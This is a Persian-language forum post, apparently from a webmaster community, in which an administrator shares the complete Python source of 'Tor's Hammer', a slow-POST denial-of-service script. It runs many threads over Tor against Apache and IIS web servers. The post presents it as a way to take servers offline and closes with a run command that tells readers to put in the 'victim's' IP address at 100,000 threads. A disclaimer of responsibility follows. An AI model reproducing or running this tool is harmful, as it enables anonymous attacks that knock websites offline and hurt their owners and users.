اسکریپت تکذیب سرویس وب سرور آپاچی

ruin3r

مدیر کل انجمن
عضو کادر مدیریت
مدیر کل انجمن
عضویت
10/5/15
ارسال ها
146
امتیاز
6
سلام.
با توجه به مطالبی که قرار داده شده است تصمیم گرفتم به مناسبت سال نو برای کاربران ایران وب ادمین اسکریپتی رو قرار بدم که توسط اون می توانید سرور هایی که از وب سرور آپاچی استفاده میکنند رو از دسترس خارج کنید.
در نظر داشته باشید که اگر سروری از وب سرور انجین ایکس در کنار آپاچی به عنوان پروکسی استفاده کند عملا این اسکریپت کارایی نخواهد داشت.
با توجه به صحبت هایی که با نویسنده این اسکریپت که از دوستان خیلی قدیمی بنده می باشد داشتم, این اسکریپت بر روی بیشتر سرور ها عمل کرده و موجب اختلال در عملکرد وب سرور قربانی می شود.
عملکرد این اسکریپت بدین صورت می باشد که بر روی پورت 9150 اتک رو ارسال میکنه و موجب از کار افتادن وب سرور می شود.

فایل رو در زیر قرار دادم و باید با پسوند .py ذخیره و در سرور اجرا کنید:

کد:
#!/usr/bin/python

# this assumes you have the socks.py (http://phiral.net/socks.py)
# and terminal.py (http://phiral.net/terminal.py) in the
# same directory and that you have tor running locally
# on port 9150. run with 128 to 256 threads to be effective.
# kills apache 1.X with ~128, apache 2.X / IIS with ~256
# not effective on nginx

import time
import sys
import random
import getopt
import socks
import string
import terminal

from threading import Thread

global stop_now
global term

stop_now = False
term = terminal.TerminalController()

useragents = [
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)",
"Googlebot/2.1 (http://www.googlebot.com/bot.html)",
"Opera/9.20 (Windows NT 6.0; U; en)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)",
"Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16",
"Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)", # maybe not
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13"
"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
"Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
"YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)"
]


class httpPost(Thread):
  def __init__(self, host, port, tor):
    Thread.__init__(self)
    self.host = host
    self.port = port
    self.socks = socks.socksocket()
    self.tor = tor
    self.running = True

  def _send_http_post(self, pause=10):
    global stop_now

    self.socks.send("POST / HTTP/1.1\r\n"
            "Host: %s\r\n"
            "User-Agent: %s\r\n"
            "Connection: keep-alive\r\n"
            "Keep-Alive: 900\r\n"
            "Content-Length: 10000\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n\r\n" %
            (self.host, random.choice(useragents)))

    for i in range(0, 9999):
      if stop_now:
        self.running = False
        break
      p = random.choice(string.letters+string.digits)
      print term.BOL+term.UP+term.CLEAR_EOL+"Posting: %s" % p+term.NORMAL
      self.socks.send(p)
      time.sleep(random.uniform(0.1, 3))

    # self.socks.close()

  def run(self):
    while self.running:
      while self.running:
        try:
          if self.tor:
            self.socks.set_proxy(socks.SOCKS5, '127.0.0.1', 9150)
            time.sleep(1)
          self.socks.connect((self.host, self.port))
          print term.BOL+term.UP+term.CLEAR_EOL+"Connected to host..."+ term.NORMAL
          break
        except Exception, e:
          print term.BOL+term.UP+term.CLEAR_EOL+"Error connecting to host..."+ term.NORMAL
          print e
          time.sleep(1)
          sys.exit()

      while self.running:
        try:
          self._send_http_post()
        except Exception, e:
          if e.args[0] == 32 or e.args[0] == 104:
            print term.BOL + term.UP + term.CLEAR_EOL + "Thread broken, restarting..." + term.NORMAL
            self.socks = socks.socksocket()
            break
          time.sleep(0.1)
          pass


def usage():
  print "./torshammer.py -t <target> [-r <threads> -p <port> -T -h]"
  print " -t|--target <Hostname|IP>"
  print " -r|--threads <Number of threads> Defaults to 256"
  print " -p|--port <Web Server Port> Defaults to 80"
  print " -T|--tor Enable anonymising through tor on 127.0.0.1:9150"
  print " -h|--help Shows this help\n"
  print "Eg. ./torshammer.py -t 192.168.1.100 -r 256\n"


def main(argv):
  try:
    opts, args = getopt.getopt(argv, "hTt:r:p:", ["help", "tor", "target=", "threads=", "port="])
  except getopt.GetoptError:
    usage()
    sys.exit(-1)

  global stop_now

  target = ''
  threads = 256
  tor = False
  port = 80

  for o, a in opts:
    if o in ("-h", "--help"):
      usage()
      sys.exit(0)
    if o in ("-T", "--tor"):
      tor = True
    elif o in ("-t", "--target"):
      target = a
    elif o in ("-r", "--threads"):
      threads = int(a)
    elif o in ("-p", "--port"):
      port = int(a)

  if target == '' or int(threads) <= 0:
    usage()
    sys.exit(-1)

  print term.DOWN + term.RED + "/*" + term.NORMAL
  print term.RED + " * Target: %s Port: %d" % (target, port) + term.NORMAL
  print term.RED + " * Threads: %d Tor: %s" % (threads, tor) + term.NORMAL
  print term.RED + " * Give 20 seconds without tor or 40 with before checking site" + term.NORMAL
  print term.RED + " */" + term.DOWN + term.DOWN + term.NORMAL

  rthreads = []
  for i in range(threads):
    t = httpPost(target, port, tor)
    rthreads.append(t)
    t.start()

  while len(rthreads) > 0:
    try:
      rthreads = [t.join(1) for t in rthreads if t is not None and t.isAlive()]
    except KeyboardInterrupt:
      print "\nShutting down threads...\n"
      for t in rthreads:
        stop_now = True
        t.running = False

if __name__ == "__main__":
  print "\n/*"
  print " *"+term.RED + " Tor's Hammer "+term.NORMAL
  print " * Slow POST DoS Testing Tool"
  print " * entropy [at] phiral.net"
  print " * Anon-ymized via Tor"
  print " * We are Legion."
  print " */\n"

  main(sys.argv[1:])
راهنمای استفاده :

کد:
python torshammer.py -t IP -r 100000 -T
به جای IP باید آی پی قربانی رو قرار بدید.
عواقب استفاده از این اسکریپت به عهده استفاده کننده بوده و انجمن ایران وب ادمین هیچ گونه مسئولیتی در قبال استفاده از این اسکریپت ندارد.

موفق باشید.
 
بالا